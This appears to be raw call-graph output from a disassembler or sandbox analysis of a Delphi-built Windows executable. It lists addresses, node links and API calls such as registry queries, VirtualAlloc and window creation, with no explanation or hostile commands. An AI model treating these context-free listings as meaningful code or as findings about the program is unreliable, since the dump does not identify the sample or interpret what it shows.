42cb08 CharNextA 53813->53884 53816 42c416 53815->53816 53817 42c439 53815->53817 53885 42c948 CharPrevA 53816->53885 53819 403494 4 API calls 53817->53819 53820 42c442 53819->53820 53820->53783 53821 42c41d 53821->53817 53822 42c428 53821->53822 53886 4035c0 53822->53886 53824 42c436 53824->53783 53826 42c648 IsDBCSLeadByte 53825->53826 53829 42cb9d 53826->53829 53827 42cbc4 53830 42cbda 53827->53830 53831 42cbcf 53827->53831 53829->53827 53908 42cb10 CharPrevA 53829->53908 53843->53792 53844->53792 53845->53792 53846->53757 53847->53792 53848->53792 53849->53779 53850->53792 53853 403494 4 API calls 53852->53853 53854 42ca88 53853->53854 53859 42cabe 53854->53859 53861 403744 53854->53861 53865 42c454 IsDBCSLeadByte 53854->53865 53857 42cb02 53857->53798 53859->53857 53866 4037b8 53859->53866 53871 42c454 IsDBCSLeadByte 53859->53871 53862 40374a 53861->53862 53864 40375b 53861->53864 53863 4034bc 4 API calls 53862->53863 53862->53864 53863->53864 53864->53854 53865->53854 53867 403744 4 API calls 53866->53867 53869 4037c6 53867->53869 53868 4037fc 53868->53859 53869->53868 53872 4038a4 53869->53872 53871->53859 53873 4038b1 53872->53873 53880 4038e1 53872->53880 53875 4038da 53873->53875 53876 4038bd 53873->53876 53874 403400 4 API calls 53878 4038cb 53874->53878 53877 4034bc 4 API calls 53875->53877 53881 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53876->53881 53877->53880 53878->53868 53880->53874 53881->53878 53882->53804 53883->53809 53884->53813 53885->53821 53887 4035c4 53886->53887 53891 40357c 53886->53891 53888 4035e2 53887->53888 53889 4035d4 53887->53889 53887->53891 53892 403450 53887->53892 53894 4034bc 4 API calls 53888->53894 53893 403450 4 API calls 53889->53893 53890 403490 53890->53824 53891->53892 53896 4035bf 53891->53896 53897 40358a 53891->53897 53895 4034bc 4 API calls 53892->53895 53898 403464 53892->53898 53893->53891 53904 4035f5 53894->53904 53895->53898 53896->53824 53899 4035b4 53897->53899 53900 40359d 53897->53900 53898->53890 53901 402660 4 API calls 53898->53901 53901->53890 53908->53829 53912 407910 53909->53912 53913 40792d 53912->53913 53920 4075c0 53913->53920 53916 407959 53918 4034e0 4 API calls 53916->53918 53919 40790b 53918->53919 53919->53472 53922 4075db 53920->53922 53921 4075ed 53921->53916 53925 4069a8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53921->53925 53922->53921 53926 4076e2 19 API calls 53922->53926 53927 4075b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53922->53927 53925->53916 53926->53922 53927->53922 53929 403400 4 API calls 53928->53929 53936 450991 53929->53936 53953 42cb8c 6 API calls 53952->53953 53954 42ccba 53953->53954 53955 42ccc2 GetFileAttributesA 53954->53955 53956 403400 4 API calls 53955->53956 53957 42ccdf 53956->53957 53957->53461 53957->53735 53958->53489 53961 4699bb 53959->53961 53960 469e33 53962 469e4e 53960->53962 53963 469e7f 53960->53963 53961->53960 53964 469a76 53961->53964 53967 403494 4 API calls 53961->53967 53966 403494 4 API calls 53962->53966 53968 403494 4 API calls 53963->53968 53965 469a97 53964->53965 53969 469ad8 53964->53969 53970 403494 4 API calls 53965->53970 53971 469e5c 53966->53971 53972 4699fa 53967->53972 53973 469e8d 53968->53973 53977 403400 4 API calls 53969->53977 53974 469aa5 53970->53974 54065 46889c 12 API calls 53971->54065 53976 414af8 4 API calls 53972->53976 54066 46889c 12 API calls 53973->54066 53979 414af8 4 API calls 53974->53979 53981 469a1b 53976->53981 53982 469ad6 53977->53982 53984 469ac6 53979->53984 53980 469e6a 53983 403400 4 API calls 53980->53983 53985 403634 4 API calls 53981->53985 54002 469bbc 53982->54002 54045 468fa8 53982->54045 53987 469eb0 53983->53987 53989 403634 4 API calls 53984->53989 53990 469a2b 53985->53990 53993 403400 4 API calls 53987->53993 53988 469c44 53991 403400 4 API calls 53988->53991 53989->53982 53994 414af8 4 API calls 53990->53994 53995 469c42 53991->53995 53992 469af8 53996 469b36 53992->53996 53997 469afe 53992->53997 53998 469eb8 53993->53998 53999 469a3f 53994->53999 54060 4693e4 43 API calls 53995->54060 54003 403400 4 API calls 53996->54003 54000 403494 4 API calls 53997->54000 54001 403420 4 API calls 53998->54001 53999->53964 54008 414af8 4 API calls 53999->54008 54004 469b0c 54000->54004 54005 469ec5 54001->54005 54002->53988 54006 469c03 54002->54006 54007 469b34 54003->54007 54051 47ad88 54004->54051 54005->53495 54012 403494 4 API calls 54006->54012 54054 46929c 54007->54054 54009 469a66 54008->54009 54013 403634 4 API calls 54009->54013 54016 469c11 54012->54016 54013->53964 54014 469c6d 54022 469cce 54014->54022 54023 469c78 54014->54023 54015 469b24 54017 403634 4 API calls 54015->54017 54018 414af8 4 API calls 54016->54018 54017->54007 54020 469c32 54018->54020 54024 403634 4 API calls 54020->54024 54021 469b5d 54027 469bbe 54021->54027 54028 469b68 54021->54028 54025 403400 4 API calls 54022->54025 54026 403494 4 API calls 54023->54026 54024->53995 54029 469cd6 54025->54029 54034 469c86 54026->54034 54031 403400 4 API calls 54027->54031 54030 403494 4 API calls 54028->54030 54032 469ccc 54029->54032 54043 469d7f 54029->54043 54036 469b76 54030->54036 54031->54002 54032->54029 54061 4930f0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54032->54061 54034->54029 54034->54032 54037 403634 4 API calls 54034->54037 54035 469cf9 54035->54043 54062 49339c 18 API calls 54035->54062 54036->54002 54039 403634 4 API calls 54036->54039 54037->54034 54039->54036 54041 469e20 54064 429154 SendMessageA SendMessageA 54041->54064 54063 429104 SendMessageA 54043->54063 54044->53497 54067 42a050 SendMessageA 54045->54067 54047 468fb7 54048 468fd7 54047->54048 54068 42a050 SendMessageA 54047->54068 54048->53992 54050 468fc7 54050->53992 54069 47ada8 54051->54069 54058 4692c9 54054->54058 54055 46932b 54056 403400 4 API calls 54055->54056 54057 469340 54056->54057 54057->54021 54058->54055 54393 469220 43 API calls 54058->54393 54060->54014 54061->54035 54062->54043 54063->54041 54064->53960 54065->53980 54066->53980 54067->54047 54068->54050 54070 403494 4 API calls 54069->54070 54078 47addb 54070->54078 54071 47aee0 54072 403420 4 API calls 54071->54072 54073 47ada3 54072->54073 54073->54015 54074 4037b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54074->54078 54076 403778 4 API calls 54076->54078 54078->54071 54078->54074 54078->54076 54081 479cfc 54078->54081 54313 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54078->54313 54314 403800 54078->54314 54318 42c948 CharPrevA 54078->54318 54082 479d4e 54081->54082 54085 479d2c 54081->54085 54083 479d6e 54082->54083 54084 479d5c 54082->54084 54088 479dd1 54083->54088 54089 479d7c 54083->54089 54086 403494 4 API calls 54084->54086 54085->54082 54323 478c2c 19 API calls 54085->54323 54210 479d69 54086->54210 54100 479df2 54088->54100 54101 479ddf 54088->54101 54091 479d85 54089->54091 54092 479dab 54089->54092 54090 403400 4 API calls 54094 47a67c 54090->54094 54095 479d98 54091->54095 54324 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54091->54324 54093 479dbe 54092->54093 54325 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54092->54325 54098 403494 4 API calls 54093->54098 54099 403400 4 API calls 54094->54099 54096 403494 4 API calls 54095->54096 54096->54210 54098->54210 54103 47a684 54099->54103 54105 479e13 54100->54105 54106 479e00 54100->54106 54104 403494 4 API calls 54101->54104 54103->54078 54104->54210 54108 479e63 54105->54108 54109 479e21 54105->54109 54107 403494 4 API calls 54106->54107 54107->54210 54114 479e84 54108->54114 54115 479e71 54108->54115 54110 479e3d 54109->54110 54111 479e2a 54109->54111 54113 479e50 54110->54113 54326 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54110->54326 54112 403494 4 API calls 54111->54112 54112->54210 54117 403494 4 API calls 54113->54117 54119 479ea5 54114->54119 54120 479e92 54114->54120 54118 403494 4 API calls 54115->54118 54117->54210 54118->54210 54122 479ec6 54119->54122 54123 479eb3 54119->54123 54121 403494 4 API calls 54120->54121 54121->54210 54125 479ee7 54122->54125 54126 479ed4 54122->54126 54124 403494 4 API calls 54123->54124 54124->54210 54128 479ef5 54125->54128 54129 479f24 54125->54129 54127 403494 4 API calls 54126->54127 54127->54210 54130 479f11 54128->54130 54131 479efe 54128->54131 54134 479f32 54129->54134 54135 479f61 54129->54135 54132 403494 4 API calls 54130->54132 54133 403494 4 API calls 54131->54133 54132->54210 54133->54210 54136 479f4e 54134->54136 54137 479f3b 54134->54137 54140 479f82 54135->54140 54141 479f6f 54135->54141 54210->54090 54313->54078 54315 403804 54314->54315 54317 40382f 54314->54317 54316 4038a4 4 API calls 54315->54316 54316->54317 54317->54078 54318->54078 54323->54085 54324->54095 54325->54093 54326->54113 54393->54058 54395 47c592 54394->54395 54399 47c5c8 54394->54399 54437 455228 54395->54437 54396 403420 4 API calls 54397 47c6dc 54396->54397 54397->53503 54399->54396 54400 47c6a5 54400->53503 54403 47c5bc 54403->54399 54403->54400 54405 47ad88 43 API calls 54403->54405 54408 47c651 54403->54408 54444 478218 54403->54444 54455 47830c 54403->54455 54459 47c12c 31 API calls 54403->54459 54404 47ad88 43 API calls 54404->54408 54405->54403 54406 42c8f8 5 API calls 54406->54408 54408->54403 54408->54404 54408->54406 54409 42c920 5 API calls 54408->54409 54411 47c692 54408->54411 54460 47c274 58 API calls 54408->54460 54409->54408 54411->54399 54522 465e28 54412->54522 54415->53512 54417 42f3e0 54416->54417 54418 42f403 GetActiveWindow GetFocus 54417->54418 54419 41eeb4 2 API calls 54418->54419 54420 42f41a 54419->54420 54421 42f437 54420->54421 54422 42f427 RegisterClassA 54420->54422 54423 42f4c6 SetFocus 54421->54423 54424 42f445 CreateWindowExA 54421->54424 54422->54421 54426 403400 4 API calls 54423->54426 54424->54423 54425 42f478 54424->54425 54553 42428c 54425->54553 54428 42f4e2 54426->54428 54432 49339c 18 API calls 54428->54432 54429 42f4a0 54430 42f4a8 CreateWindowExA 54429->54430 54430->54423 54431 42f4be ShowWindow 54430->54431 54431->54423 54432->53532 54559 44ad68 54433->54559 54438 455239 54437->54438 54439 455246 54438->54439 54440 45523d 54438->54440 54469 45500c 29 API calls 54439->54469 54461 454f2c 54440->54461 54443 455243 54443->54403 54445 47822e 54444->54445 54446 47822a 54444->54446 54447 403450 4 API calls 54445->54447 54446->54403 54448 47823b 54447->54448 54449 478241 54448->54449 54450 47825b 54448->54450 54498 4780d8 54449->54498 54451 4780d8 19 API calls 54450->54451 54453 478257 54451->54453 54454 403400 4 API calls 54453->54454 54454->54446 54456 478318 54455->54456 54457 478333 54456->54457 54521 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54456->54521 54457->54403 54459->54403 54460->54408 54470 42dd44 54461->54470 54463 454f49 54464 454f97 54463->54464 54473 454e60 54463->54473 54464->54443 54467 454e60 6 API calls 54468 454f78 RegCloseKey 54467->54468 54468->54443 54469->54443 54471 42dd55 RegOpenKeyExA 54470->54471 54472 42dd4f 54470->54472 54471->54463 54472->54471 54478 42dc80 54473->54478 54475 403420 4 API calls 54476 454f12 54475->54476 54476->54467 54477 454e88 54477->54475 54481 42db28 54478->54481 54482 42db4e RegQueryValueExA 54481->54482 54483 42db93 54482->54483 54489 42db71 54482->54489 54484 403400 4 API calls 54483->54484 54486 42dc5f 54484->54486 54485 42db8b 54487 403400 4 API calls 54485->54487 54486->54477 54487->54483 54488 4034e0 4 API calls 54488->54489 54489->54483 54489->54485 54489->54488 54490 403744 4 API calls 54489->54490 54491 42dbc8 RegQueryValueExA 54490->54491 54491->54482 54492 42dbe4 54491->54492 54492->54483 54493 4038a4 4 API calls 54492->54493 54494 42dc26 54493->54494 54495 42dc38 54494->54495 54497 403744 4 API calls 54494->54497 54496 403450 4 API calls 54495->54496 54496->54483 54497->54495 54499 4780f3 54498->54499 54501 478124 54499->54501 54509 4781b2 54499->54509 54516 477f8c 19 API calls 54499->54516 54504 478149 54501->54504 54517 477f8c 19 API calls 54501->54517 54505 47816a 54504->54505 54518 477f8c 19 API calls 54504->54518 54506 4781aa 54505->54506 54505->54509 54519 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54505->54519 54510 477e10 54506->54510 54509->54453 54511 477e4b 54510->54511 54512 403450 4 API calls 54511->54512 54513 477e70 54512->54513 54520 476500 19 API calls 54513->54520 54515 477eb1 54515->54509 54516->54501 54517->54504 54518->54505 54519->54506 54520->54515 54521->54457 54523 403494 4 API calls 54522->54523 54524 465e56 54523->54524 54539 42daf0 54524->54539 54527 42daf0 5 API calls 54528 465e7a 54527->54528 54529 465d14 19 API calls 54528->54529 54530 465e84 54529->54530 54531 42daf0 5 API calls 54530->54531 54532 465e93 54531->54532 54542 465d8c 54532->54542 54535 42daf0 5 API calls 54536 465eac 54535->54536 54537 403400 4 API calls 54536->54537 54538 465ec1 54537->54538 54538->53507 54546 42da38 54539->54546 54543 465dac 54542->54543 54544 4078fc 19 API calls 54543->54544 54545 465df6 54544->54545 54545->54535 54547 42dae3 54546->54547 54550 42da58 54546->54550 54547->54527 54548 4037b8 4 API calls 54548->54550 54550->54547 54550->54548 54551 403800 4 API calls 54550->54551 54552 42c454 IsDBCSLeadByte 54550->54552 54551->54550 54552->54550 54554 4242be 54553->54554 54555 42429e GetWindowTextA 54553->54555 54557 403494 4 API calls 54554->54557 54556 4034e0 4 API calls 54555->54556 54558 4242bc 54556->54558 54557->54558 54558->54429 54562 44abe0 54559->54562 54563 44ac13 54562->54563 54564 414af8 4 API calls 54563->54564 54565 44ac26 54564->54565 54566 40357c 4 API calls 54565->54566 54567 44ac53 73A1A570 54565->54567 54566->54567 54573 41a1f8 54567->54573 54574 41a223 54573->54574 54575 41a2bf 54573->54575 54592 403520 54574->54592 54576 403400 4 API calls 54575->54576 54577 41a2d7 SelectObject 54576->54577 54593 4034e0 4 API calls 54592->54593 54594 40352a 54593->54594 54598 4649ff 54595->54598 54596 464ada 54606 4667a4 54596->54606 54597 464a92 54597->54596 54625 4185c8 7 API calls 54597->54625 54598->54596 54601 464a4f 54598->54601 54619 421a2c 54598->54619 54601->54597 54602 464a94 54601->54602 54603 464a89 54601->54603 54605 421a2c 7 API calls 54602->54605 54604 421a2c 7 API calls 54603->54604 54604->54597 54605->54597 54607 4667d4 54606->54607 54608 4667b5 54606->54608 54607->53560 54609 414b28 4 API calls 54608->54609 54610 4667c3 54609->54610 54611 414b28 4 API calls 54610->54611 54611->54607 54613 469f3d 54612->54613 54614 421a2c 7 API calls 54613->54614 54615 469f96 54614->54615 54615->53586 54617 466274 18 API calls 54615->54617 54616->53562 54617->53586 54618->53588 54620 421a84 54619->54620 54622 421a3a 54619->54622 54620->54601 54621 421a69 54621->54620 54634 421d38 SetFocus GetFocus 54621->54634 54622->54621 54626 408cc4 54622->54626 54625->54596 54627 408cd0 54626->54627 54635 406df4 LoadStringA 54627->54635 54630 403450 4 API calls 54631 408d01 54630->54631 54632 403400 4 API calls 54631->54632 54633 408d16 54632->54633 54633->54621 54634->54620 54636 4034e0 4 API calls 54635->54636 54637 406e21 54636->54637 54637->54630 54639 46b7e1 54638->54639 54640 414af8 4 API calls 54639->54640 54641 46b82e 54639->54641 54642 46b7f7 54640->54642 54643 403420 4 API calls 54641->54643 54826 466038 6 API calls 54642->54826 54645 46b8d8 54643->54645 54645->53601 54819 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54645->54819 54646 46b7ff 54647 414b28 4 API calls 54646->54647 54648 46b80d 54647->54648 54649 46b81a 54648->54649 54651 46b833 54648->54651 54827 47d508 42 API calls 54649->54827 54652 46b84b 54651->54652 54653 46611c CharNextA 54651->54653 54828 47d508 42 API calls 54652->54828 54655 46b847 54653->54655 54655->54652 54656 46b861 54655->54656 54657 46b867 54656->54657 54658 46b87d 54656->54658 54829 47d508 42 API calls 54657->54829 54660 42c968 CharNextA 54658->54660 54661 46b88a 54660->54661 54661->54641 54830 4661a8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54661->54830 54663 46b8a1 54664 450ab8 4 API calls 54663->54664 54665 46b8ae 54664->54665 54831 47d508 42 API calls 54665->54831 54668 480ab9 54667->54668 54669 480a8b 54667->54669 54671 4749c8 54668->54671 54832 49314c 18 API calls 54669->54832 54833 456f08 54671->54833 54674 4072b0 SetCurrentDirectoryA 54675 474a1e 54674->54675 54820->53609 54826->54646 54827->54641 54828->54641 54829->54641 54830->54663 54831->54641 54832->54668 54834 456f34 54833->54834 54835 45703c 54833->54835 55374 456c04 GetSystemTimeAsFileTime FileTimeToSystemTime 54834->55374 54836 45708d 54835->54836 55378 456774 6 API calls 54835->55378 54839 403400 4 API calls 54836->54839 54841 4570a2 54839->54841 54840 456f3c 54842 4078fc 19 API calls 54840->54842 54841->54674 54843 456fad 54842->54843 55375 456ef8 20 API calls 54843->55375 55374->54840 55378->54836 56577 431740 56538->56577 56540 403400 4 API calls 56541 43d2ca 56540->56541 56541->53667 56541->53668 56542 43d246 56542->56540 56544 43142a 56543->56544 56545 402648 4 API calls 56544->56545 56546 43145a 56545->56546 56547 492c58 56546->56547 56548 492d2d 56547->56548 56549 492c72 56547->56549 56554 492d70 56548->56554 56549->56548 56551 4335c0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56549->56551 56553 403450 4 API calls 56549->56553 56582 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56549->56582 56583 4314f4 56549->56583 56551->56549 56553->56549 56555 492d8c 56554->56555 56591 4335c0 56555->56591 56557 492d91 56558 4314f4 4 API calls 56557->56558 56559 492d9c 56558->56559 56560 43cde8 56559->56560 56561 43ce15 56560->56561 56566 43ce07 56560->56566 56561->53678 56562 43ce91 56570 43cf4b 56562->56570 56594 4468d8 56562->56594 56564 43cedc 56600 43d5a4 56564->56600 56566->56561 56566->56562 56567 4468d8 4 API calls 56566->56567 56567->56566 56568 43d151 56568->56561 56620 446878 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56568->56620 56570->56568 56571 43d132 56570->56571 56618 446878 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56570->56618 56619 446878 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56571->56619 56574->53680 56575->53682 56576->53669 56578 403494 4 API calls 56577->56578 56579 43174f 56578->56579 56580 431779 56579->56580 56581 403744 4 API calls 56579->56581 56580->56542 56581->56579 56582->56549 56584 431502 56583->56584 56587 431514 56583->56587 56589 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56584->56589 56586 431536 56586->56549 56587->56586 56590 431494 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56587->56590 56589->56587 56590->56586 56592 402648 4 API calls 56591->56592 56593 4335cf 56592->56593 56593->56557 56595 4468f7 56594->56595 56596 4468fe 56594->56596 56621 446684 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56595->56621 56597 4314f4 4 API calls 56596->56597 56599 44690e 56597->56599 56599->56564 56601 43d5c0 56600->56601 56614 43d5ed 56600->56614 56602 402660 4 API calls 56601->56602 56601->56614 56602->56601 56603 43d622 56603->56570 56605 43f6f9 56605->56603 56607 43c18c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56607->56614 56609 446878 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56609->56614 56612 43356c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56612->56614 56613 43336c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56613->56614 56614->56603 56614->56605 56614->56607 56614->56609 56614->56612 56614->56613 56615 435ea4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56614->56615 56616 431494 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56614->56616 56617 446684 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56614->56617 56622 438f34 56614->56622 56628 4366a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56614->56628 56629 43d49c 18 API calls 56614->56629 56630 433588 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56614->56630 56615->56614 56616->56614 56617->56614 56618->56570 56619->56568 56620->56568 56621->56596 56628->56614 56629->56614 56630->56614 56633 47efd8 56634 47efe1 56633->56634 56636 47f00c 56633->56636 56634->56636 56637 47effe 56634->56637 56635 47f04b 56639 47f05e 56635->56639 56640 47f06b 56635->56640 56636->56635 57044 47d9dc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56636->57044 57042 4756fc 188 API calls 56637->57042 56645 47f062 56639->56645 56646 47f0a0 56639->56646 56642 47f085 56640->56642 56643 47f074 56640->56643 57047 47dbe8 42 API calls 56642->57047 57046 47db78 42 API calls 56643->57046 56644 47f03e 57045 47db78 42 API calls 56644->57045 56656 47f0e3 56645->56656 56657 47f0fe 56645->56657 56658 47f066 56645->56658 56650 47f0c4 56646->56650 56651 47f0a9 56646->56651 56647 47f003 56647->56636 57043 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56647->57043 57049 47dbe8 42 API calls 56650->57049 57048 47dbe8 42 API calls 56651->57048 57050 47dbe8 42 API calls 56656->57050 57051 47dbe8 42 API calls 56657->57051 56661 47f127 56658->56661 56662 47f145 56658->56662 56663 47f13c 56661->56663 57052 47db78 42 API calls 56661->57052 57054 47d874 24 API calls 56662->57054 57053 47d874 24 API calls 56663->57053 56667 47f143 56668 47f155 56667->56668 56669 47f15b 56667->56669 56670 47f159 56668->56670 56767 47db54 56668->56767 56669->56670 56671 47db54 42 API calls 56669->56671 56772 47b154 56670->56772 56671->56670 57065 47d508 42 API calls 56767->57065 56769 47db6f 57066 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56769->57066 56773 42d864 GetWindowsDirectoryA 56772->56773 56774 47b172 56773->56774 56775 403450 4 API calls 56774->56775 56776 47b17f 56775->56776 56777 42d890 GetSystemDirectoryA 56776->56777 56778 47b187 56777->56778 56779 403450 4 API calls 56778->56779 56780 47b194 56779->56780 56781 42d8bc 6 API calls 56780->56781 56782 47b19c 56781->56782 56783 403450 4 API calls 56782->56783 56784 47b1a9 56783->56784 56785 47b1b2 56784->56785 56786 47b1ce 56784->56786 57087 42d1d4 56785->57087 56788 403400 4 API calls 56786->56788 56790 47b1cc 56788->56790 56792 47b213 56790->56792 56793 42c898 5 API calls 56790->56793 56791 403450 4 API calls 56791->56790 57067 47afdc 56792->57067 56796 47b1ee 56793->56796 56798 403450 4 API calls 56796->56798 56797 403450 4 API calls 56799 47b22f 56797->56799 56800 47b1fb 56798->56800 56801 47b24d 56799->56801 56802 4035c0 4 API calls 56799->56802 56800->56792 56804 403450 4 API calls 56800->56804 56803 47afdc 8 API calls 56801->56803 56802->56801 56805 47b25c 56803->56805 56804->56792 56806 403450 4 API calls 56805->56806 56807 47b269 56806->56807 56808 47b291 56807->56808 56809 42c40c 5 API calls 56807->56809 57042->56647 57044->56644 57045->56635 57046->56658 57047->56658 57048->56658 57049->56658 57050->56658 57051->56658 57052->56663 57053->56667 57054->56667 57065->56769 57068 42dd44 RegOpenKeyExA 57067->57068 57069 47b002 57068->57069 57070 47b006 57069->57070 57071 47b028 57069->57071 57072 42dc74 6 API calls 57070->57072 57073 403400 4 API calls 57071->57073 57074 47b012 57072->57074 57075 47b02f 57073->57075 57076 47b01d RegCloseKey 57074->57076 57077 403400 4 API calls 57074->57077 57075->56797 57076->57075 57077->57076 57088 4038a4 4 API calls 57087->57088 57089 42d1e7 57088->57089 57090 42d1fe GetEnvironmentVariableA 57089->57090 57094 42d211 57089->57094 57097 42daf8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57089->57097 57090->57089 57091 42d20a 57090->57091 57092 403400 4 API calls 57091->57092 57092->57094 57094->56791 57097->57089 58587 416420 58589 416432 58587->58589 58588 416472 GetClassInfoA 58590 41649e 58588->58590 58589->58588 58607 408d34 19 API calls 58589->58607 58592 4164fe 58590->58592 58593 4164c0 RegisterClassA 58590->58593 58594 4164b0 UnregisterClassA 58590->58594 58598 416527 58592->58598 58599 4164f9 58592->58599 58593->58592 58596 4164e8 58593->58596 58594->58593 58595 41646d 58595->58588 58597 408cc4 5 API calls 58596->58597 58597->58599 58608 40754c 58598->58608 58599->58592 58600 408cc4 5 API calls 58599->58600 58600->58598 58604 416540 58605 41a1f8 5 API calls 58604->58605 58606 41654a 58605->58606 58607->58595 58609 407550 58608->58609 58610 40755a 58608->58610 58611 402660 4 API calls 58609->58611 58612 418394 7 API calls 58610->58612 58611->58610 58612->58604 58613 49706c 58671 403344 58613->58671 58615 49707a 58674 4056a0 58615->58674 58617 49707f 58677 406334 GetModuleHandleA GetProcAddress 58617->58677 58623 49708e 58694 410964 58623->58694 58625 497093 58698 412938 58625->58698 58944 4032fc 58671->58944 58673 403349 GetModuleHandleA GetCommandLineA 58673->58615 58676 4056db 58674->58676 58945 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 58674->58945 58676->58617 58678 406350 58677->58678 58679 406357 GetProcAddress 58677->58679 58678->58679 58680 406366 58679->58680 58681 40636d GetProcAddress 58679->58681 58680->58681 58682 406380 58681->58682 58683 40637c SetProcessDEPPolicy 58681->58683 58684 409954 58682->58684 58683->58682 58946 40902c 58684->58946 58689 408728 7 API calls 58690 409977 58689->58690 58961 409078 GetVersionExA 58690->58961 58693 409b88 6F551CD0 58693->58623 58695 41096e 58694->58695 58696 4109ad GetCurrentThreadId 58695->58696 58697 4109c8 58696->58697 58697->58625 58963 40af0c 58698->58963 58944->58673 58945->58676 58947 408cc4 5 API calls 58946->58947 58948 40903d 58947->58948 58949 4085e4 GetSystemDefaultLCID 58948->58949 58952 40861a 58949->58952 58950 406df4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 58950->58952 58951 408570 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 58951->58952 58952->58950 58952->58951 58953 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 58952->58953 58957 40867c 58952->58957 58953->58952 58954 406df4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 58954->58957 58955 408570 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 58955->58957 58956 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 58956->58957 58957->58954 58957->58955 58957->58956 58958 4086ff 58957->58958 58959 403420 4 API calls 58958->58959 58960 408719 58959->58960 58960->58689 58962 40908f 58961->58962 58962->58693 58965 40af13 58963->58965 58964 40af32 58967 41101c 58964->58967 58965->58964 58974 40ae44 19 API calls 58965->58974 58968 41103e 58967->58968 58969 406df4 5 API calls 58968->58969 58970 403450 4 API calls 58968->58970 58971 41105d 58968->58971 58969->58968 58970->58968 58972 403400 4 API calls 58971->58972 58973 411072 58972->58973 58974->58965 60308 41ee64 60309 41ee73 IsWindowVisible 60308->60309 60310 41eea9 60308->60310 60309->60310 60311 41ee7d IsWindowEnabled 60309->60311 60311->60310 60312 41ee87 60311->60312 60313 402648 4 API calls 60312->60313 60314 41ee91 EnableWindow 60313->60314 60314->60310 60315 30e2127 60316 30e2130 60315->60316 60317 30e210a 60316->60317 60319 45cff4 60316->60319 60320 45d003 60319->60320 60321 45d037 VirtualAlloc 60320->60321 60325 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60320->60325 60323 45d04f 60321->60323 60323->60317 60324 45d032 60324->60321 60325->60324 60326 41fb68 60327 41fb71 60326->60327 60330 41fe0c 60327->60330 60329 41fb7e 60331 41fefe 60330->60331 60332 41fe23 60330->60332 60331->60329 60332->60331 60351 41f9cc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 60332->60351 60334 41fe59 60335 41fe83 60334->60335 60336 41fe5d 60334->60336 60361 41f9cc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 60335->60361 60352 41fbac 60336->60352 60339 41fe91 60341 41fe95 60339->60341 60342 41febb 60339->60342 60345 41fbac 10 API calls 60341->60345 60346 41fbac 10 API calls 60342->60346 60343 41fbac 10 API calls 60344 41fe81 60343->60344 60344->60329 60347 41fea7 60345->60347 60348 41fecd 60346->60348 60349 41fbac 10 API calls 60347->60349 60350 41fbac 10 API calls 60348->60350 60349->60344 60350->60344 60351->60334 60353 41fbc7 60352->60353 60354 41fbdd 60353->60354 60355 41f94c 4 API calls 60353->60355 60362 41f94c 60354->60362 60355->60354 60357 41fc25 60358 41fc48 SetScrollInfo 60357->60358 60370 41faac 60358->60370 60361->60339 60363 4181f0 60362->60363 60364 41f969 GetWindowLongA 60363->60364 60365 41f9a6 60364->60365 60366 41f986 60364->60366 60382 41f8d8 GetWindowLongA GetSystemMetrics GetSystemMetrics 60365->60382 60381 41f8d8 GetWindowLongA GetSystemMetrics GetSystemMetrics 60366->60381 60369 41f992 60369->60357 60371 41faba 60370->60371 60372 41fac2 60370->60372 60371->60343 60373 41faff 60372->60373 60374 41fb01 60372->60374 60375 41faf1 60372->60375 60377 41fb41 GetScrollPos 60373->60377 60384 417e58 IsWindowVisible ScrollWindow SetWindowPos 60374->60384 60383 417e58 IsWindowVisible ScrollWindow SetWindowPos 60375->60383 60377->60371 60379 41fb4c 60377->60379 60380 41fb5b SetScrollPos 60379->60380 60380->60371 60381->60369 60382->60369 60383->60373 60384->60373 60385 4205a8 60386 4205bb 60385->60386 60406 415b40 60386->60406 60388 420702 60389 420719 60388->60389 60413 4146e4 KiUserCallbackDispatcher 60388->60413 60393 420730 60389->60393 60414 414728 KiUserCallbackDispatcher 60389->60414 60390 420661 60411 420858 20 API calls 60390->60411 60391 4205f6 60391->60388 60391->60390 60399 420652 MulDiv 60391->60399 60394 420752 60393->60394 60415 420070 12 API calls 60393->60415 60397 42067a 